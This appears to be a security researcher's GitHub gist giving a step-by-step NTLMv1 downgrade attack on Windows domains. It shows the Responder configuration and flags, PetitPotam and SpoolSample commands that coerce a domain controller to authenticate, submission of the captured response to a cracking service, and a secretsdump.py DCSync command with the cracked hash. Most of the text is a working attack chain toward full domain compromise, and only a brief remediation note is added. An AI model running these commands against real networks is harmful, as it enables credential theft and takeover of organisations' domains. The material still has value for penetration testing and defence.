Skip to content

Instantly share code, notes, and snippets.

@S3cur3Th1sSh1t

S3cur3Th1sSh1t/NTLMv1_Downgrade.md Secret

Last active July 20, 2023 14:18
Show Gist options
  • Star 20 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb to your computer and use it in GitHub Desktop.
Save S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb to your computer and use it in GitHub Desktop.
Download ZIP
Raw
NTLMv1_Downgrade.md

What is this?

This technique is already some years old. Nothing really new. But still very fancy and effective. And is described for example in this Repository. I myself starred this Repo some years ago because I found it interesting but never used the technique in project for who knows reasons. Only one time trying to Brute Force the NTLMv1 Hash via Hashcat I found myself in a too long wait time and the technique disappeared the background again.

But what if we can get instant Domain pwnage via NTLMv1 downgrade attacks? I stumbled across this Tweet from T3nb3w who himself got the tip by MrUn1k0d3r.

Time to revisit the technique and the nessesary steps.

Which systems are vulnerable?

According to the Repo: This will work on networks where "LAN Manager authentication level" is set to 2 or less. This is a fairly common scenario in older, larger Windows deployments. It should not work on Windows 10 / Server 2016 or newer.

But: Other never systens may also be affected due to manual misconfigurations for example. Or for legacy reasons the config is still alive on migrated systems, which can be WS2k19 or other.

What can we do - low level?

If we are able to coerce a Domain Controller for authentication to our attacker system with Spoolsample or Petitpotam we are able to dowgrade the authentication to NetNTLMv1 Challenge/Response authentication. This uses the outdated encryption method DES to protect the NT/LM Hashes.

So by brute forcing all possible DES encryption values we can get back the NT or LM Hash (if in use) for the target system. This will take several days with Hashcat. Instead of going through all possible values with Hashcat, we can use Rainbowtables instead with the free cracking service:

But how?

  1. Modify the Responder.conf to use the custom Challenge 1122334455667788:

Image1

  1. Start Responder with the flag --lm --disable-ess:

Responder.py -I eth0 --lm --disable-ess

  1. Trigger Domain Controller machine authentication to your Responder listener interface via SpoolSample or PetitPotam:

PetitPotam.exe Responder-IP DC-IP

PetitPotam.py -u User -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP

OR

SpoolSample.exe DC-IP Responder-IP

PetitPotam

If you didn't get a Hash here - the target system is not vulnerable and has correct Lan Manager authentication settings set.

  1. Grab the 48 HEX response characters from the incoming DC NTLMv1 auth:

NTLMv1Response

  1. Submit that to Crack.sh with NTHASH: in front

crack.sh

GetCracking

  1. You'll receive an E-Mail with the Cracked NT-Hash:

Cracked

DCSync via secretsdump.py:

secretsdump.py -hashes CrackedHash:CrackedHash 'Domain/DC-Hostname$'@DC-IP

Win.

Remediation

Set the Lan Manager authentication level to at minimum Send NTLMv2 responses only, recommended is Send NTLMv2 responses only. Refuse LM & NTLM

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment